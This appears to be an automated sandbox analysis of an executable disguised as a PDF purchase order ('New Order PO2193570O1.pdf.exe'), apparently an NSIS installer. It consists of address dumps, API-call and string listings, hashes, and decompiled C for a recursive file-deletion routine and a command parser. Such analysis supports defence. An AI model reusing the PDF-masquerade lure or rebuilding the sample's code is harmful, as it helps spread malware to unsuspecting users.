                                                                                                                              0x00403545
                                                                                                                              0x00403547
                                                                                                                              0x00403549
                                                                                                                              0x0040354b
                                                                                                                              0x0040354d
                                                                                                                              0x0040354f
                                                                                                                              0x0040355f
                                                                                                                              0x00403561
                                                                                                                              0x00403563
                                                                                                                              0x00403570
                                                                                                                              0x0040357f
                                                                                                                              0x00403587
                                                                                                                              0x0040358f
                                                                                                                              0x0040358f
                                                                                                                              0x00403563
                                                                                                                              0x0040354f
                                                                                                                              0x0040354b
                                                                                                                              0x00403594
                                                                                                                              0x0040359a
                                                                                                                              0x0040359c
                                                                                                                              0x004035a0
                                                                                                                              0x004035a0
                                                                                                                              0x0040359c
                                                                                                                              0x004035a5
                                                                                                                              0x004035aa
                                                                                                                              0x004035ad
                                                                                                                              0x004035af
                                                                                                                              0x004035af
                                                                                                                              0x004035b7
                                                                                                                              0x004035b7
                                                                                                                              0x00403446
                                                                                                                              0x0040344d
                                                                                                                              0x0040344d
                                                                                                                              0x004033c3
                                                                                                                              0x004033c9
                                                                                                                              0x00403418
                                                                                                                              0x00403418
                                                                                                                              0x00403424
                                                                                                                              0x00000000
                                                                                                                              0x00403424
                                                                                                                              0x004033d2
                                                                                                                              0x004033df
                                                                                                                              0x004033d6
                                                                                                                              0x004033dc
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004033de
                                                                                                                              0x004033de
                                                                                                                              0x004033de
                                                                                                                              0x004033e3
                                                                                                                              0x004033e5
                                                                                                                              0x004033ed
                                                                                                                              0x00403459
                                                                                                                              0x0040345e
                                                                                                                              0x0040346d
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00403471
                                                                                                                              0x00403478
                                                                                                                              0x0040347e
                                                                                                                              0x00403484
                                                                                                                              0x0040348c
                                                                                                                              0x0040348c
                                                                                                                              0x0040349a
                                                                                                                              0x004034a1
                                                                                                                              0x004034aa
                                                                                                                              0x004034b0
                                                                                                                              0x004034b0
                                                                                                                              0x004034bc
                                                                                                                              0x004034c2
                                                                                                                              0x004034cc
                                                                                                                              0x004034e0
                                                                                                                              0x004034e1
                                                                                                                              0x004034e2
                                                                                                                              0x004034e7
                                                                                                                              0x004034f3
                                                                                                                              0x004034f9
                                                                                                                              0x00403500
                                                                                                                              0x00403503
                                                                                                                              0x00403509
                                                                                                                              0x00403509
                                                                                                                              0x00403500
                                                                                                                              0x0040350d
                                                                                                                              0x00403513
                                                                                                                              0x00403513
                                                                                                                              0x00403516
                                                                                                                              0x00403517
                                                                                                                              0x00403518
                                                                                                                              0x00000000
                                                                                                                              0x00403518
                                                                                                                              0x004033ef
                                                                                                                              0x004033f1
                                                                                                                              0x004033fc
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00403404
                                                                                                                              0x0040340f
                                                                                                                              0x00403414
                                                                                                                              0x00000000
                                                                                                                              0x00403414
                                                                                                                              0x00403390
                                                                                                                              0x0040339c
                                                                                                                              0x004033a1
                                                                                                                              0x004033a6
                                                                                                                              0x004033a8
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004033a8
                                                                                                                              0x00000000
                                                                                                                              0x00403345
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004032f9
                                                                                                                              0x004032f9
                                                                                                                              0x004032f9
                                                                                                                              0x004032fa
                                                                                                                              0x004032fa
                                                                                                                              0x00000000
                                                                                                                              0x004032f9
                                                                                                                              0x00000000

                                                                                                                              APIs
                                                                                                                              • #17.COMCTL32 ref: 0040325B
                                                                                                                              • SetErrorMode.KERNELBASE(00008001), ref: 00403266
                                                                                                                              • OleInitialize.OLE32(00000000), ref: 0040326D
                                                                                                                                • Part of subcall function 00405E88: GetModuleHandleA.KERNEL32(?,?,00000000,0040327F,00000008), ref: 00405E9A
                                                                                                                                • Part of subcall function 00405E88: LoadLibraryA.KERNELBASE(?,?,00000000,0040327F,00000008), ref: 00405EA5
                                                                                                                                • Part of subcall function 00405E88: GetProcAddress.KERNEL32(00000000,?), ref: 00405EB6
                                                                                                                              • SHGetFileInfoA.SHELL32(0041F458,00000000,?,00000160,00000000,00000008), ref: 00403295
                                                                                                                                • Part of subcall function 00405B66: lstrcpynA.KERNEL32(?,?,00000400,004032AA,hyperventilate Setup,NSIS Error), ref: 00405B73
                                                                                                                              • GetCommandLineA.KERNEL32(hyperventilate Setup,NSIS Error), ref: 004032AA
                                                                                                                              • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\New Order PO2193570O1.pdf.exe" ,00000000), ref: 004032BD
                                                                                                                              • CharNextA.USER32(00000000,"C:\Users\user\Desktop\New Order PO2193570O1.pdf.exe" ,00000020), ref: 004032E8
                                                                                                                              • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 0040337B
                                                                                                                              • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403390
                                                                                                                              • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040339C
                                                                                                                              • DeleteFileA.KERNELBASE(1033), ref: 004033AF
                                                                                                                              • OleUninitialize.OLE32(00000000), ref: 0040342D
                                                                                                                              • ExitProcess.KERNEL32 ref: 0040344D
                                                                                                                              • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\New Order PO2193570O1.pdf.exe" ,00000000,00000000), ref: 00403459
                                                                                                                              • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\New Order PO2193570O1.pdf.exe" ,00000000,00000000), ref: 00403465
                                                                                                                              • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403471
                                                                                                                              • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 00403478
                                                                                                                              • DeleteFileA.KERNEL32(0041F058,0041F058,?,00424000,?), ref: 004034C2
                                                                                                                              • CopyFileA.KERNEL32(C:\Users\user\Desktop\New Order PO2193570O1.pdf.exe,0041F058,00000001), ref: 004034D6
                                                                                                                              • CloseHandle.KERNEL32(00000000,0041F058,0041F058,?,0041F058,00000000), ref: 00403503
                                                                                                                              • GetCurrentProcess.KERNEL32(00000028,?,00000005,00000004,00000003), ref: 00403558
                                                                                                                              • ExitWindowsEx.USER32(00000002,00000000), ref: 00403594
                                                                                                                              • ExitProcess.KERNEL32 ref: 004035B7
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.201984153.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.201978360.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.201994006.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202000566.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202075629.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202089293.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202121649.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202148009.000000000042F000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202159816.0000000000433000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202170813.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202189588.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202210290.000000000043C000.00000002.00020000.sdmp Download File
                                                                                                                              Similarity
                                                                                                                              • API ID: File$DirectoryExitHandleProcess$CurrentDeleteModuleWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                                                              • String ID: /D=$ _?=$"$"C:\Users\user\Desktop\New Order PO2193570O1.pdf.exe" $1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\New Order PO2193570O1.pdf.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$hyperventilate Setup$~nsu.tmp
                                                                                                                              • API String ID: 2278157092-2436489534
                                                                                                                              • Opcode ID: b237e16242222b526cfbc7eec5e85b12329012a3d6ce1955aa8a6be5a5dec380
                                                                                                                              • Instruction ID: d9df3101e86bd055252ea398e1a167ecdf9755d8b7b18b8fa076e16bcd865dbe
                                                                                                                              • Opcode Fuzzy Hash: b237e16242222b526cfbc7eec5e85b12329012a3d6ce1955aa8a6be5a5dec380
                                                                                                                              • Instruction Fuzzy Hash: E191D231A087417EE7216F609D49B2B7EACEB01306F44457BF941B61E2C77CAE058B6E
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0040548B, Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 156filestringCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 94%
                                                                                                                              			E0040548B(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				struct _WIN32_FIND_DATAA _v332;
				signed int _t37;
				char* _t49;
				signed int _t52;
				signed int _t55;
				signed int _t61;
				signed int _t63;
				void* _t65;
				signed int _t68;
				CHAR* _t70;
				CHAR* _t72;
				char* _t75;

				_t72 = _a4;
				_t37 = E0040573A(__eflags, _t72);
				_v12 = _t37;
				if((_a8 & 0x00000008) != 0) {
					_t63 = DeleteFileA(_t72); // executed
					asm("sbb eax, eax");
					_t65 =  ~_t63 + 1;
					 *0x423f28 =  *0x423f28 + _t65;
					return _t65;
				}
				_t68 = _a8 & 0x00000001;
				__eflags = _t68;
				_v8 = _t68;
				if(_t68 == 0) {
					L5:
					E00405B66(0x4214a8, _t72);
					__eflags = _t68;
					if(_t68 == 0) {
						E004056A0(_t72);
					} else {
						lstrcatA(0x4214a8, "\*.*");
					}
					__eflags =  *_t72;
					if( *_t72 != 0) {
						L10:
						lstrcatA(_t72, 0x409010);
						L11:
						_t70 =  &(_t72[lstrlenA(_t72)]);
						_t37 = FindFirstFileA(0x4214a8,  &_v332);
						__eflags = _t37 - 0xffffffff;
						_a4 = _t37;
						if(_t37 == 0xffffffff) {
							L29:
							__eflags = _v8;
							if(_v8 != 0) {
								_t31 = _t70 - 1;
								 *_t31 =  *(_t70 - 1) & 0x00000000;
								__eflags =  *_t31;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t75 =  &(_v332.cFileName);
							_t49 = E00405684( &(_v332.cFileName), 0x3f);
							__eflags =  *_t49;
							if( *_t49 != 0) {
								__eflags = _v332.cAlternateFileName;
								if(_v332.cAlternateFileName != 0) {
									_t75 =  &(_v332.cAlternateFileName);
								}
							}
							__eflags =  *_t75 - 0x2e;
							if( *_t75 != 0x2e) {
								L19:
								E00405B66(_t70, _t75);
								__eflags = _v332.dwFileAttributes & 0x00000010;
								if((_v332.dwFileAttributes & 0x00000010) == 0) {
									E0040581E(_t72);
									_t52 = DeleteFileA(_t72);
									__eflags = _t52;
									if(_t52 != 0) {
										E00404F04(0xfffffff2, _t72);
									} else {
										__eflags = _a8 & 0x00000004;
										if((_a8 & 0x00000004) == 0) {
											 *0x423f28 =  *0x423f28 + 1;
										} else {
											E00404F04(0xfffffff1, _t72);
											_push(0);
											_push(_t72);
											E004058B4();
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E0040548B(_t70, __eflags, _t72, _a8);
									}
								}
								goto L27;
							}
							_t61 =  *((intOrPtr*)(_t75 + 1));
							__eflags = _t61;
							if(_t61 == 0) {
								goto L27;
							}
							__eflags = _t61 - 0x2e;
							if(_t61 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t75 + 2));
							if( *((char*)(_t75 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t55 = FindNextFileA(_a4,  &_v332);
							__eflags = _t55;
						} while (_t55 != 0);
						_t37 = FindClose(_a4);
						goto L29;
					}
					__eflags =  *0x4214a8 - 0x5c;
					if( *0x4214a8 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t37;
					if(_t37 == 0) {
						L31:
						__eflags = _v8;
						if(_v8 == 0) {
							L39:
							return _t37;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t37 = E00405E61(_t72);
							__eflags = _t37;
							if(_t37 == 0) {
								goto L39;
							}
							E00405659(_t72);
							E0040581E(_t72);
							_t37 = RemoveDirectoryA(_t72);
							__eflags = _t37;
							if(_t37 != 0) {
								return E00404F04(0xffffffe5, _t72);
							}
							__eflags = _a8 & 0x00000004;
							if((_a8 & 0x00000004) == 0) {
								goto L33;
							}
							E00404F04(0xfffffff1, _t72);
							_push(0);
							_push(_t72);
							return E004058B4();
						}
						L33:
						 *0x423f28 =  *0x423f28 + 1;
						return _t37;
					}
					__eflags = _a8 & 0x00000002;
					if((_a8 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}

















                                                                                                                              0x00405496
                                                                                                                              0x0040549a
                                                                                                                              0x004054a3
                                                                                                                              0x004054a6
                                                                                                                              0x004054a9
                                                                                                                              0x004054b1
                                                                                                                              0x004054b3
                                                                                                                              0x004054b4
                                                                                                                              0x00000000
                                                                                                                              0x004054b4
                                                                                                                              0x004054c3
                                                                                                                              0x004054c3
                                                                                                                              0x004054c6
                                                                                                                              0x004054c9
                                                                                                                              0x004054dd
                                                                                                                              0x004054e4
                                                                                                                              0x004054e9
                                                                                                                              0x004054eb
                                                                                                                              0x004054fb
                                                                                                                              0x004054ed
                                                                                                                              0x004054f3
                                                                                                                              0x004054f3
                                                                                                                              0x00405500
                                                                                                                              0x00405503
                                                                                                                              0x0040550e
                                                                                                                              0x00405514
                                                                                                                              0x00405519
                                                                                                                              0x00405529
                                                                                                                              0x0040552b
                                                                                                                              0x00405531
                                                                                                                              0x00405534
                                                                                                                              0x00405537
                                                                                                                              0x004055f4
                                                                                                                              0x004055f4
                                                                                                                              0x004055f8
                                                                                                                              0x004055fa
                                                                                                                              0x004055fa
                                                                                                                              0x004055fa
                                                                                                                              0x004055fa
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0040553d
                                                                                                                              0x0040553d
                                                                                                                              0x00405546
                                                                                                                              0x0040554c
                                                                                                                              0x00405551
                                                                                                                              0x00405554
                                                                                                                              0x00405556
                                                                                                                              0x0040555a
                                                                                                                              0x0040555c
                                                                                                                              0x0040555c
                                                                                                                              0x0040555a
                                                                                                                              0x0040555f
                                                                                                                              0x00405562
                                                                                                                              0x00405575
                                                                                                                              0x00405577
                                                                                                                              0x0040557c
                                                                                                                              0x00405583
                                                                                                                              0x0040559b
                                                                                                                              0x004055a1
                                                                                                                              0x004055a7
                                                                                                                              0x004055a9
                                                                                                                              0x004055ce
                                                                                                                              0x004055ab
                                                                                                                              0x004055ab
                                                                                                                              0x004055af
                                                                                                                              0x004055c3
                                                                                                                              0x004055b1
                                                                                                                              0x004055b4
                                                                                                                              0x004055b9
                                                                                                                              0x004055bb
                                                                                                                              0x004055bc
                                                                                                                              0x004055bc
                                                                                                                              0x004055af
                                                                                                                              0x00405585
                                                                                                                              0x0040558b
                                                                                                                              0x0040558d
                                                                                                                              0x00405593
                                                                                                                              0x00405593
                                                                                                                              0x0040558d
                                                                                                                              0x00000000
                                                                                                                              0x00405583
                                                                                                                              0x00405564
                                                                                                                              0x00405567
                                                                                                                              0x00405569
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0040556b
                                                                                                                              0x0040556d
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0040556f
                                                                                                                              0x00405573
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004055d3
                                                                                                                              0x004055dd
                                                                                                                              0x004055e3
                                                                                                                              0x004055e3
                                                                                                                              0x004055ee
                                                                                                                              0x00000000
                                                                                                                              0x004055ee
                                                                                                                              0x00405505
                                                                                                                              0x0040550c
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004054cb
                                                                                                                              0x004054cb
                                                                                                                              0x004054cd
                                                                                                                              0x004055fe
                                                                                                                              0x00405601
                                                                                                                              0x00405604
                                                                                                                              0x00405656
                                                                                                                              0x00405656
                                                                                                                              0x00405656
                                                                                                                              0x00405606
                                                                                                                              0x00405609
                                                                                                                              0x00405614
                                                                                                                              0x00405619
                                                                                                                              0x0040561b
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0040561e
                                                                                                                              0x00405624
                                                                                                                              0x0040562a
                                                                                                                              0x00405630
                                                                                                                              0x00405632
                                                                                                                              0x00000000
                                                                                                                              0x0040564e
                                                                                                                              0x00405634
                                                                                                                              0x00405638
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0040563d
                                                                                                                              0x00405642
                                                                                                                              0x00405643
                                                                                                                              0x00000000
                                                                                                                              0x00405644
                                                                                                                              0x0040560b
                                                                                                                              0x0040560b
                                                                                                                              0x00000000
                                                                                                                              0x0040560b
                                                                                                                              0x004054d3
                                                                                                                              0x004054d7
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004054d7

                                                                                                                              APIs
                                                                                                                              • DeleteFileA.KERNELBASE(?,?,"C:\Users\user\Desktop\New Order PO2193570O1.pdf.exe" ,74B5F560), ref: 004054A9
                                                                                                                              • lstrcatA.KERNEL32(004214A8,\*.*,004214A8,?,00000000,?,"C:\Users\user\Desktop\New Order PO2193570O1.pdf.exe" ,74B5F560), ref: 004054F3
                                                                                                                              • lstrcatA.KERNEL32(?,00409010,?,004214A8,?,00000000,?,"C:\Users\user\Desktop\New Order PO2193570O1.pdf.exe" ,74B5F560), ref: 00405514
                                                                                                                              • lstrlenA.KERNEL32(?,?,00409010,?,004214A8,?,00000000,?,"C:\Users\user\Desktop\New Order PO2193570O1.pdf.exe" ,74B5F560), ref: 0040551A
                                                                                                                              • FindFirstFileA.KERNEL32(004214A8,?,?,?,00409010,?,004214A8,?,00000000,?,"C:\Users\user\Desktop\New Order PO2193570O1.pdf.exe" ,74B5F560), ref: 0040552B
                                                                                                                              • FindNextFileA.KERNEL32(?,00000010,000000F2,?), ref: 004055DD
                                                                                                                              • FindClose.KERNEL32(?), ref: 004055EE
                                                                                                                              Strings
                                                                                                                              • "C:\Users\user\Desktop\New Order PO2193570O1.pdf.exe" , xrefs: 00405495
                                                                                                                              • \*.*, xrefs: 004054ED
                                                                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 0040548B
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.201984153.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.201978360.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.201994006.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202000566.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202075629.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202089293.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202121649.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202148009.000000000042F000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202159816.0000000000433000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202170813.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202189588.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202210290.000000000043C000.00000002.00020000.sdmp Download File
                                                                                                                              Similarity
                                                                                                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                              • String ID: "C:\Users\user\Desktop\New Order PO2193570O1.pdf.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                                              • API String ID: 2035342205-1995695052
                                                                                                                              • Opcode ID: 6c8ee5a3fe02bedcc3e1648cc4c34db6c3543f7bd00f265664a9289eb0c65dd6
                                                                                                                              • Instruction ID: bc429f5d1e1b14784ce7e3564347ec6ed469848bfd5577fff983359c073685a4
                                                                                                                              • Opcode Fuzzy Hash: 6c8ee5a3fe02bedcc3e1648cc4c34db6c3543f7bd00f265664a9289eb0c65dd6
                                                                                                                              • Instruction Fuzzy Hash: 0351F331904A447ADB216B218C45BBF3B79CF42728F54847BF905711E2CB3C5A82DE6E
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 709B1A98, Relevance: 20.1, APIs: 13, Instructions: 591stringlibrarymemoryCOMMONCrypto
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 95%
                                                                                                                              			E709B1A98() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				CHAR* _v24;
				CHAR* _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				CHAR* _v48;
				signed int _v52;
				void* _v56;
				intOrPtr _v60;
				CHAR* _t207;
				signed int _t210;
				void* _t212;
				void* _t214;
				CHAR* _t216;
				void* _t224;
				struct HINSTANCE__* _t225;
				struct HINSTANCE__* _t226;
				struct HINSTANCE__* _t228;
				signed short _t230;
				struct HINSTANCE__* _t233;
				struct HINSTANCE__* _t235;
				void* _t236;
				char* _t237;
				void* _t248;
				signed char _t249;
				signed int _t250;
				void* _t254;
				struct HINSTANCE__* _t256;
				void* _t257;
				signed int _t259;
				intOrPtr _t260;
				char* _t263;
				signed int _t268;
				signed int _t271;
				signed int _t273;
				void* _t276;
				void* _t280;
				struct HINSTANCE__* _t282;
				intOrPtr _t285;
				void _t286;
				signed int _t287;
				signed int _t299;
				signed int _t300;
				intOrPtr _t303;
				void* _t304;
				signed int _t308;
				signed int _t311;
				signed int _t314;
				signed int _t315;
				signed int _t316;
				intOrPtr _t319;
				intOrPtr* _t320;
				CHAR* _t321;
				CHAR* _t323;
				CHAR* _t324;
				struct HINSTANCE__* _t325;
				void* _t327;
				signed int _t328;
				void* _t329;

				_t282 = 0;
				_v32 = 0;
				_v36 = 0;
				_v16 = 0;
				_v8 = 0;
				_v40 = 0;
				_t329 = 0;
				_v52 = 0;
				_v44 = 0;
				_t207 = E709B1215();
				_v24 = _t207;
				_v28 = _t207;
				_v48 = E709B1215();
				_t320 = E709B123B();
				_v56 = _t320;
				_v12 = _t320;
				while(1) {
					_t210 = _v32;
					_v60 = _t210;
					if(_t210 != _t282 && _t329 == _t282) {
						break;
					}
					_t319 =  *_t320;
					_t285 = _t319;
					_t212 = _t285 - _t282;
					if(_t212 == 0) {
						_t37 =  &_v32;
						 *_t37 = _v32 | 0xffffffff;
						__eflags =  *_t37;
						L20:
						_t214 = _v60 - _t282;
						if(_t214 == 0) {
							 *_v28 =  *_v28 & 0x00000000;
							__eflags = _t329 - _t282;
							if(_t329 == _t282) {
								_t254 = GlobalAlloc(0x40, 0x14a4); // executed
								_t329 = _t254;
								 *(_t329 + 0x810) = _t282;
								 *(_t329 + 0x814) = _t282;
							}
							_t286 = _v36;
							_t47 = _t329 + 8; // 0x8
							_t216 = _t47;
							_t48 = _t329 + 0x408; // 0x408
							_t321 = _t48;
							 *_t329 = _t286;
							 *_t216 =  *_t216 & 0x00000000;
							 *(_t329 + 0x808) = _t282;
							 *_t321 =  *_t321 & 0x00000000;
							_t287 = _t286 - _t282;
							__eflags = _t287;
							 *(_t329 + 0x80c) = _t282;
							 *(_t329 + 4) = _t282;
							if(_t287 == 0) {
								__eflags = _v28 - _v24;
								if(_v28 == _v24) {
									goto L42;
								}
								_t327 = 0;
								GlobalFree(_t329);
								_t329 = E709B12FE(_v24);
								__eflags = _t329 - _t282;
								if(_t329 == _t282) {
									goto L42;
								} else {
									goto L35;
								}
								while(1) {
									L35:
									_t248 =  *(_t329 + 0x14a0);
									__eflags = _t248 - _t282;
									if(_t248 == _t282) {
										break;
									}
									_t327 = _t329;
									_t329 = _t248;
									__eflags = _t329 - _t282;
									if(_t329 != _t282) {
										continue;
									}
									break;
								}
								__eflags = _t327 - _t282;
								if(_t327 != _t282) {
									 *(_t327 + 0x14a0) = _t282;
								}
								_t249 =  *(_t329 + 0x810);
								__eflags = _t249 & 0x00000008;
								if((_t249 & 0x00000008) == 0) {
									_t250 = _t249 | 0x00000002;
									__eflags = _t250;
									 *(_t329 + 0x810) = _t250;
								} else {
									_t329 = E709B1534(_t329);
									 *(_t329 + 0x810) =  *(_t329 + 0x810) & 0xfffffff5;
								}
								goto L42;
							} else {
								_t299 = _t287 - 1;
								__eflags = _t299;
								if(_t299 == 0) {
									L31:
									lstrcpyA(_t216, _v48);
									L32:
									lstrcpyA(_t321, _v24);
									goto L42;
								}
								_t300 = _t299 - 1;
								__eflags = _t300;
								if(_t300 == 0) {
									goto L32;
								}
								__eflags = _t300 != 1;
								if(_t300 != 1) {
									goto L42;
								}
								goto L31;
							}
						} else {
							if(_t214 == 1) {
								_t256 = _v16;
								if(_v40 == _t282) {
									_t256 = _t256 - 1;
								}
								 *(_t329 + 0x814) = _t256;
							}
							L42:
							_v12 = _v12 + 1;
							_v28 = _v24;
							L59:
							if(_v32 != 0xffffffff) {
								_t320 = _v12;
								continue;
							}
							break;
						}
					}
					_t257 = _t212 - 0x23;
					if(_t257 == 0) {
						__eflags = _t320 - _v56;
						if(_t320 <= _v56) {
							L17:
							__eflags = _v44 - _t282;
							if(_v44 != _t282) {
								L43:
								_t259 = _v32 - _t282;
								__eflags = _t259;
								if(_t259 == 0) {
									_t260 = _t319;
									while(1) {
										__eflags = _t260 - 0x22;
										if(_t260 != 0x22) {
											break;
										}
										_t320 = _t320 + 1;
										__eflags = _v44 - _t282;
										_v12 = _t320;
										if(_v44 == _t282) {
											_v44 = 1;
											L162:
											_v28 =  &(_v28[1]);
											 *_v28 =  *_t320;
											L58:
											_t328 = _t320 + 1;
											__eflags = _t328;
											_v12 = _t328;
											goto L59;
										}
										_t260 =  *_t320;
										_v44 = _t282;
									}
									__eflags = _t260 - 0x2a;
									if(_t260 == 0x2a) {
										_v36 = 2;
										L57:
										_t320 = _v12;
										_v28 = _v24;
										_t282 = 0;
										__eflags = 0;
										goto L58;
									}
									__eflags = _t260 - 0x2d;
									if(_t260 == 0x2d) {
										L151:
										_t303 =  *_t320;
										__eflags = _t303 - 0x2d;
										if(_t303 != 0x2d) {
											L154:
											_t263 = _t320 + 1;
											__eflags =  *_t263 - 0x3a;
											if( *_t263 != 0x3a) {
												goto L162;
											}
											__eflags = _t303 - 0x2d;
											if(_t303 == 0x2d) {
												goto L162;
											}
											_v36 = 1;
											L157:
											_v12 = _t263;
											__eflags = _v28 - _v24;
											if(_v28 <= _v24) {
												 *_v48 =  *_v48 & 0x00000000;
											} else {
												 *_v28 =  *_v28 & 0x00000000;
												lstrcpyA(_v48, _v24);
											}
											goto L57;
										}
										_t263 = _t320 + 1;
										__eflags =  *_t263 - 0x3e;
										if( *_t263 != 0x3e) {
											goto L154;
										}
										_v36 = 3;
										goto L157;
									}
									__eflags = _t260 - 0x3a;
									if(_t260 != 0x3a) {
										goto L162;
									}
									goto L151;
								}
								_t268 = _t259 - 1;
								__eflags = _t268;
								if(_t268 == 0) {
									L80:
									_t304 = _t285 + 0xffffffde;
									__eflags = _t304 - 0x55;
									if(_t304 > 0x55) {
										goto L57;
									}
									switch( *((intOrPtr*)(( *(_t304 + 0x709b2259) & 0x000000ff) * 4 +  &M709B21CD))) {
										case 0:
											__eax = _v24;
											__edi = _v12;
											while(1) {
												__edi = __edi + 1;
												_v12 = __edi;
												__cl =  *__edi;
												__eflags = __cl - __dl;
												if(__cl != __dl) {
													goto L132;
												}
												L131:
												__eflags =  *(__edi + 1) - __dl;
												if( *(__edi + 1) != __dl) {
													L136:
													 *__eax =  *__eax & 0x00000000;
													__eax = E709B1224(_v24);
													__ebx = __eax;
													goto L97;
												}
												L132:
												__eflags = __cl;
												if(__cl == 0) {
													goto L136;
												}
												__eflags = __cl - __dl;
												if(__cl == __dl) {
													__edi = __edi + 1;
													__eflags = __edi;
												}
												__cl =  *__edi;
												 *__eax =  *__edi;
												__eax = __eax + 1;
												__edi = __edi + 1;
												_v12 = __edi;
												__cl =  *__edi;
												__eflags = __cl - __dl;
												if(__cl != __dl) {
													goto L132;
												}
												goto L131;
											}
										case 1:
											_v8 = 1;
											goto L57;
										case 2:
											_v8 = _v8 | 0xffffffff;
											goto L57;
										case 3:
											_v8 = _v8 & 0x00000000;
											_v20 = _v20 & 0x00000000;
											_v16 = _v16 + 1;
											goto L85;
										case 4:
											__eflags = _v20;
											if(_v20 != 0) {
												goto L57;
											}
											_v12 = _v12 - 1;
											__ebx = E709B1215();
											 &_v12 = E709B1A36( &_v12);
											__eax = E709B1429(__edx, __eax, __edx, __ebx);
											goto L97;
										case 5:
											L105:
											_v20 = _v20 + 1;
											goto L57;
										case 6:
											_push(7);
											goto L123;
